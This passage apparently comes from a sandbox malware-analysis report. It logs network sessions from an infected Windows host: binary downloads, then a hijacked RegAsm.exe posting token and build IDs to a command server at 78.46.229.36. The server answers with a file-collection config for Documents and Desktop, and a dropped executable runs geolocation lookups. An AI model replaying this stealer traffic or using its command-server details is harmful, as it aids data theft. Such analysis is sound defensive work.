2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 05 06 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 1c 06 03 00 52 20 11 01 71 23 15 04 6d 07 12 18 4d 00 00 00 00 00 44 60 65 07 97 de df 01 0e 16 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 0f 01 39 86 47 00 bd c4 6b 00 fa dc 78 00 ff dc 78 03 ff 3d 9a c2 ff 29 60 7c bd 09 9d e8 ef 02 9a e2 e4 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: ( @R q#mMD`e9Gkxx=)`\|
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 27 36 9e cd de ba af ce e2 af 23 51 06 e4 a2 12 b5 a5 23 d1 6a 12 25 89 ec 65 18 2b db 92 aa ab f2 cc 1a e1 22 8f 67 4a 17 d5 fa bf ed b8 fb 72 d6 2d 70 53 e1 7c 3e 40 b8 06 07 d5 20 98 12 9a 91 ac 1e a7 30 e0 53 75 3c 7b 48 16 bd 96 b7 28 14 5b 7a 5c 1f 11 ed 65 8b 5a e6 3c 92 e1 01 7e b3 69 de f9 64 e3 26 b2 1d ab d6 bf 92 a6 e9 fa f6 6c 1a c1 fb ba 91 13 ed f3 0f 87 ec 5c 1e 92 53 0f 0b 62 ac 2e 73 75 82 bd be 65 8a c3 6c 87 43 f1 18 07 78 95 52 e7 f6 b3 61 ce 1d 8d 2d 8c 2e 51 da 07 af ea d7 45 6a 34 b2 50 b4 72 77 ce a4 f2 d0 ab 79 02 75 a5 4b 7c e5 85 b8 cf cd d3 48 ea e2 b8 fc 3e d5 60 0f 53 b1 3d 84 60 c0 14 08 0a 44 80 2b f4 b3 92 80 37 24 16 59 df 1f 98 27 6d bb 6d bf 09 1c 9d 5b cf 5b 14 88 ae c8 b9 9c ab 00 c0 d2 3a 06 b9 e6 b5 f4 84 92 b2 50 Data Ascii: '6#Q#j%e+"gJr-pS\|>@ 0Su<{H([z\eZ<~id&l\Sb.suelCxRa-.QEj4PrwyuK\|H>`S=`D+7$Y'mm[[:P
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 7b 77 19 25 ea bc 4e 4a b8 30 68 50 cf 89 da 42 47 0f d9 c6 26 23 b1 60 97 53 96 6d a3 0b 0e c6 92 dc a2 1d 08 7a 71 9a 04 a0 6c a3 ea f9 18 34 5c da a3 11 74 38 08 8a cd ac a6 7f 0d 2e 6a 6c 15 f3 a1 d0 e6 ba 2b e4 1c d5 f9 2a 62 9d d2 b0 87 57 c6 28 be 14 25 8f f6 bf 9f f6 18 e3 ec aa b9 cf c9 ee ee 00 36 f5 f8 7f 77 59 e7 cf 1e 5b 21 0e 6b 79 e0 03 98 df bc a6 56 30 a6 95 3a d2 6e 6d 8e c7 10 c8 95 46 39 92 19 ab 61 c3 b3 f4 de fb 0d 7e af d7 aa 7f 5d 39 47 83 37 29 68 a9 68 b6 d3 8d 75 9b 07 ab a1 8b 6d 6d a2 8a 6b 63 fc f7 db e6 23 d7 31 66 0a ca c0 af 6b 6b 73 30 40 fd da 5f e7 99 f5 fc 17 7a b2 b6 9f 64 79 f7 3c 29 0a 09 ec f6 90 19 8f c0 b0 38 e6 70 fe 33 9b c1 3c 18 20 2f b7 92 52 cd 64 99 2c 30 1d 7f 9e ba e0 b8 c1 ab 6a 05 09 e7 64 44 50 54 dc Data Ascii: {w%NJ0hPBG&#`Smzql4\t8.jl+*bW(%6wY[!kyV0:nmF9a~]9G7)hhummkc#1fkks0@_zdy<)8p3< /Rd,0jdDPT
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 5d 6f 51 e1 7e 77 f0 da f0 fb bf e7 f0 dd 1f 82 c2 1e 52 f6 d9 48 cf 67 6a be ec 65 18 3f 45 f0 e4 21 b4 c1 95 f4 11 e9 ad 8e cf c0 7f 3f 0d 1a fb d5 43 7b bc cd 78 b1 ca d8 80 fd ce 5a cd 17 7e c3 f1 98 ba c7 63 f3 16 c5 2d 7c cf e4 1c 24 73 ee c0 56 ec f9 89 21 8a 6f 5c 9e fb 76 c5 22 0f bf ea de 6f 3b 98 2d 46 3e d3 b4 1c 01 53 da fa 4b dd 9f c0 bf 5c f3 56 1f c7 47 bf 92 76 f6 08 23 59 cc 61 df 7d 7d c2 76 a6 58 bb 71 52 86 c8 f7 ef 11 c2 82 3e 9d 4d 56 a2 72 ec ef a8 56 04 c7 ab 74 ae aa 8f 48 4f 69 07 83 e2 3c a9 3a bf 28 c8 d5 a2 ed a5 68 1a 71 65 cf 59 72 af 39 16 83 49 83 dd 0d c8 c3 35 31 a8 77 ba 3e d2 e9 b6 b2 24 af 9a c1 f4 bb 04 b4 98 da 87 6b f3 8a c6 64 fd ff 5d dd 5b be c2 8c 1a 6d f3 b8 69 38 94 d3 e9 ba 70 a5 95 4f 5c ef 6a 65 0e c4 b9 Data Ascii: ]oQ~wRHgje?E!?C{xZ~c-\|$sV!o\v"o;-F>SK\VGv#Ya}}vXqR>MVrVtHOi<:(hqeYr9I51w>$kd][mi8pO\je
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 0b 24 82 38 f2 65 dd 03 e7 16 ea 7c 0d f5 cc 7d 55 b9 22 fe 70 fc 18 3b ec 3a 32 25 35 08 40 79 3c 31 f2 58 2a 31 7a f7 5f 83 67 d7 7a 88 f7 93 fb 8e 7a 33 c2 35 af 97 1f 42 8f 34 a1 f9 2e 5c 41 48 c1 2f 70 d6 e1 84 a0 8a 1b 4f e6 23 cb d2 b3 74 4c db 92 ad 72 0e 94 0a 03 ad c5 ca 28 8f 86 b9 3e df 6d 77 1f e5 55 c3 97 85 4a 4d 87 59 42 ac 19 b8 a3 4f a3 b5 c7 a6 6d b4 7d c6 37 04 32 44 19 85 70 9c 8a 92 d7 c9 6d 66 55 48 00 75 48 3f 9e c9 69 ce d9 55 20 c6 f7 2c 97 31 05 c2 48 63 b5 a3 15 20 6f 3e d9 48 5a 75 79 4b f4 b5 06 70 47 37 86 a9 da ce 01 e7 2f c5 a3 74 1b 86 5c ea ba 39 06 40 bb 7d 97 b6 fc 9f 87 8c 90 67 fd ea ad e9 b8 1f eb d5 fd 3f 30 de f8 b3 ea a7 f5 f1 7c 3f bf d8 c5 89 cd 67 09 c0 3c 70 0b f1 0a ca 0a 1c 45 ae c3 fa d6 b4 7d 3b 3e 26 23 Data Ascii: $8e\|}U"p;:2%5@y<1X*1z_gzz35B4.\AH/pO#tLr(>mwUJMYBOm}72DpmfUHuH?iU ,1Hc o>HZuyKpG7/t\9@}g?0\|?g<pE};>&#
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: 09 fe ab fe 64 19 c9 9e c2 96 6f d3 d3 ed 34 60 a6 87 fc a3 7d 5e 49 a6 85 b5 a9 ef fd 53 aa 9e 6e 29 94 a9 5f 6b 43 8f 14 e6 27 6d 39 7e be 08 63 c1 fc 96 fc 2f bb f4 4b d3 d3 9c d8 17 b9 b2 f7 b2 38 20 13 db 95 e6 52 5a ca cf 7d b1 54 4b 77 f1 c1 ff 2d 52 d7 90 e4 71 3d 63 21 c8 be 64 ef 2e 1b 4e 9d 76 65 5b 5e 43 fd 45 fb 2f 69 96 d2 4c 46 2d 7b e4 d1 4b d3 0b 09 79 df 7f 72 e5 d8 a3 e5 f0 d3 15 d9 3e 3c 01 53 b9 b5 d4 4b 84 c2 b9 bf e4 95 ce 69 cf 9b d9 b9 3e e8 29 ec 80 ff d8 d8 e9 5e e9 22 4d 7c 17 df 4c f7 b9 93 be b7 2c 1e 5a 41 92 cf 5e e7 0a d4 b4 19 3d 93 58 7e d3 39 b2 62 a1 e2 12 5d 7d 6e de c8 4f a0 e3 da cc 6a 95 33 33 63 de 3f 43 e2 ab 29 ee 77 41 96 56 e4 fe 5e 83 d0 cd 03 70 6e cd 0d 4d 07 02 8a ba 8d cd 62 d3 84 c6 32 36 3a 56 fe 4c 2e Data Ascii: do4`}^ISn)_kC'm9~c/K8 RZ}TKw-Rq=c!d.Nve[^CE/iLF-{Kyr><SKi>)^"M\|L,ZA^=X~9b]}nOj33c?C)wAV^pnMb26:VL.
2024-03-28 08:15:58 UTC	16384	IN	Data Raw: d3 1a 84 9e 9a 35 ab 3c fc 4a 98 68 16 e1 1c 07 43 84 6e 80 4c 6e 39 02 2c c3 38 14 8c b7 7c 91 43 ac 7a 99 fa e8 ba 85 7e d7 e8 81 73 2d 40 45 cc d3 5a 80 3f a0 6a 0d 34 0d a7 10 06 16 f4 33 8c 01 24 c8 f9 49 28 c0 ca b6 78 b6 67 b2 5e 0e 54 d7 44 d0 91 54 58 ea 6d f5 89 65 2c 82 19 23 fe 47 16 8f db a8 fd 6d 51 5d 7a 3d 85 38 53 46 51 f5 68 c9 92 93 1a c5 35 92 f2 ab a7 57 48 51 f2 a4 67 d8 dd 06 37 11 46 75 d4 2d 6b 87 65 d2 a6 5c cb 9b 65 f2 5c ee 7b 9c e2 08 d2 74 7a 57 43 71 e6 ed e1 e0 33 76 09 8a 08 01 4a d0 e2 f4 3b 48 fe 46 3a bb 80 c8 53 d9 6b 8d 33 cf 76 73 85 fe 69 64 c0 75 b8 65 e5 a3 52 f1 60 71 55 7d 70 33 99 5b 04 f5 d9 41 65 0a 29 45 36 ed 09 cb 33 b6 5c 8f db ae 33 0e c7 fc 02 13 6b d9 e0 3b 55 f7 8a e2 b4 e6 67 cc 2f c9 6c 41 c3 12 b4 Data Ascii: 5<JhCnLn9,8\|Cz~s-@EZ?j43$I(xg^TDTXme,#GmQ]z=8SFQh5WHQg7Fu-ke\e\{tzWCq3vJ;HF:Sk3vsidueR`qU}p3[Ae)E63\3k;Ug/lA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49853	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:00 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKEBFHIJECFIDGDGCGHC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:00 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 45 42 46 48 49 4a 45 43 46 49 44 47 44 47 43 47 48 43 0d 0a 43 6f 6e 74 Data Ascii: ------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------BKEBFHIJECFIDGDGCGHCContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------BKEBFHIJECFIDGDGCGHCCont
2024-03-28 08:16:01 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:01 UTC	127	IN	Data Raw: 37 34 0d 0a 52 47 39 6a 64 57 31 6c 62 6e 52 7a 66 43 56 45 54 30 4e 56 54 55 56 4f 56 46 4d 6c 58 48 77 71 4c 6e 52 34 64 48 77 78 4e 54 42 38 4e 58 77 71 64 32 6c 75 5a 47 39 33 63 79 70 38 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 6f 75 64 48 68 30 66 44 45 31 4d 48 77 31 66 43 70 33 61 57 35 6b 62 33 64 7a 4b 6e 77 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: 74RG9jdW1lbnRzfCVET0NVTUVOVFMlXHwqLnR4dHwxNTB8NXwqd2luZG93cyp8RGVza3RvcHwlREVTS1RPUCVcfCoudHh0fDE1MHw1fCp3aW5kb3dzKnw=0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49854	34.117.186.192	443	7688	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:00 UTC	238	OUT	GET /widget/demo/102.165.48.43 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ipinfo.io
2024-03-28 08:16:00 UTC	516	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 28 Mar 2024 08:16:00 GMT content-type: application/json; charset=utf-8 Content-Length: 1021 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 186 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-28 08:16:00 UTC	736	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 38 39 35 31 2c 2d 37 37 2e 30 33 36 34 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 30 30 34 22 2c 0a 20 20 20 20 22 74 69 6d 65 Data Ascii: { "input": "102.165.48.43", "data": { "ip": "102.165.48.43", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.8951,-77.0364", "org": "AS174 Cogent Communications", "postal": "20004", "time
2024-03-28 08:16:00 UTC	285	IN	Data Raw: 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 47 72 6f 75 6e 64 20 46 6c 6f 6f 72 2c 20 34 20 56 69 63 74 6f 72 69 61 20 53 71 75 61 72 65 2c 20 53 74 20 41 6c 62 61 6e 73 2c 20 48 65 72 74 66 6f 72 64 73 68 69 72 65 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 47 42 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 69 70 78 6f 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 64 76 69 6e 61 73 20 52 61 63 6b 61 75 73 6b 61 73 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 30 32 2e 31 36 35 2e 30 2e 30 2f 31 38 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 74 65 6c Data Ascii: se": { "address": "Ground Floor, 4 Victoria Square, St Albans, Hertfordshire, London, United Kingdom", "country": "GB", "email": "abuse@ipxo.com", "name": "Edvinas Rackauskas", "network": "102.165.0.0/18", "phone": "tel

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49855	104.26.4.15	443	7688	C:\Users\user\Documents\SimpleAdobe\I4B42zAlYY8EYRVPVQPCuOQX.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:01 UTC	262	OUT	GET /demo/home.php?s=102.165.48.43 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com
2024-03-28 08:16:01 UTC	660	IN	HTTP/1.1 200 OK Date: Thu, 28 Mar 2024 08:16:01 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC462273:C2AA_93878F2E:0050_66052741_5AE58BA:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2xOb%2FMgw5o4FdSjV%2BZF8FIoZC5hlNmmFaQh5RfyNsNBFjF44nlvsCFStTeWOPZ1JaEOI8A5h6ZAGjTNNm94MlcdfYF%2Fh8G%2FhvpQSdBNuuI%2BmE%2Fv3vc49MLC45w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 86b62cf8c8ba5b16-IAD alt-svc: h3=":443"; ma=86400
2024-03-28 08:16:01 UTC	707	IN	Data Raw: 32 62 63 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 69 70 41 64 64 72 65 73 73 22 3a 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 69 73 45 75 4d 65 6d 62 65 72 22 3a 66 61 6c 73 65 2c 22 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 22 63 75 72 72 65 6e 63 79 4e 61 6d 65 22 3a 22 44 6f 6c 6c 61 72 22 2c 22 70 68 6f 6e 65 50 72 65 66 69 78 22 3a 22 31 22 2c 22 6c 61 6e 67 75 61 67 65 73 22 Data Ascii: 2bc{"status":"ok","demoInfo":{"ipAddress":"102.165.48.43","continentCode":"NA","continentName":"North America","countryCode":"US","countryName":"United States","isEuMember":false,"currencyCode":"USD","currencyName":"Dollar","phonePrefix":"1","languages"
2024-03-28 08:16:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49856	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:01 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIJKFHIJKKEBGCFBFH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:01 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 4a 4b 46 48 49 4a 4b 4b 45 42 47 43 46 42 46 48 0d 0a 43 6f 6e 74 Data Ascii: ------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------CAFIJKFHIJKKEBGCFBFHContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------CAFIJKFHIJKKEBGCFBFHCont
2024-03-28 08:16:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49858	78.46.229.36	443	6284	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:03 UTC	310	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGDHJDAFHJEBFIDAFHI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Host: 78.46.229.36 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-03-28 08:16:03 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 44 48 4a 44 41 46 48 4a 45 42 46 49 44 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 33 39 34 36 65 39 64 64 66 39 31 66 62 33 30 63 32 35 63 39 62 33 37 37 35 35 35 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 44 48 4a 44 41 46 48 4a 45 42 46 49 44 41 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 65 32 62 37 37 35 32 32 64 30 61 39 32 66 66 64 37 35 33 36 37 31 62 30 63 37 30 38 36 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 44 48 4a 44 41 46 48 4a 45 42 46 49 44 41 46 48 49 0d 0a 43 6f 6e 74 Data Ascii: ------GCGDHJDAFHJEBFIDAFHIContent-Disposition: form-data; name="token"373946e9ddf91fb30c25c9b377555812------GCGDHJDAFHJEBFIDAFHIContent-Disposition: form-data; name="build_id"27e2b77522d0a92ffd753671b0c70869------GCGDHJDAFHJEBFIDAFHICont
2024-03-28 08:16:04 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 28 Mar 2024 08:16:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-03-28 08:16:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49867	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:10 UTC	238	OUT	GET /widget/demo/102.165.48.43 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: ipinfo.io
2024-03-28 08:16:10 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Thu, 28 Mar 2024 08:16:10 GMT content-type: application/json; charset=utf-8 Content-Length: 1021 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-03-28 08:16:10 UTC	738	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 31 30 32 2e 31 36 35 2e 34 38 2e 34 33 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 57 61 73 68 69 6e 67 74 6f 6e 2c 20 44 2e 43 2e 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 38 2e 38 39 35 31 2c 2d 37 37 2e 30 33 36 34 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 32 30 30 30 34 22 2c 0a 20 20 20 20 22 74 69 6d 65 Data Ascii: { "input": "102.165.48.43", "data": { "ip": "102.165.48.43", "city": "Washington", "region": "Washington, D.C.", "country": "US", "loc": "38.8951,-77.0364", "org": "AS174 Cogent Communications", "postal": "20004", "time
2024-03-28 08:16:10 UTC	283	IN	Data Raw: 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 47 72 6f 75 6e 64 20 46 6c 6f 6f 72 2c 20 34 20 56 69 63 74 6f 72 69 61 20 53 71 75 61 72 65 2c 20 53 74 20 41 6c 62 61 6e 73 2c 20 48 65 72 74 66 6f 72 64 73 68 69 72 65 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 6e 69 74 65 64 20 4b 69 6e 67 64 6f 6d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 47 42 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 69 70 78 6f 2e 63 6f 6d 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 45 64 76 69 6e 61 73 20 52 61 63 6b 61 75 73 6b 61 73 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 31 30 32 2e 31 36 35 2e 30 2e 30 2f 31 38 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 74 65 6c 3a 2b Data Ascii: ": { "address": "Ground Floor, 4 Victoria Square, St Albans, Hertfordshire, London, United Kingdom", "country": "GB", "email": "abuse@ipxo.com", "name": "Edvinas Rackauskas", "network": "102.165.0.0/18", "phone": "tel:+

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49868	104.26.4.15	443

Timestamp	Bytes transferred	Direction	Data
2024-03-28 08:16:10 UTC	262	OUT	GET /demo/home.php?s=102.165.48.43 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com
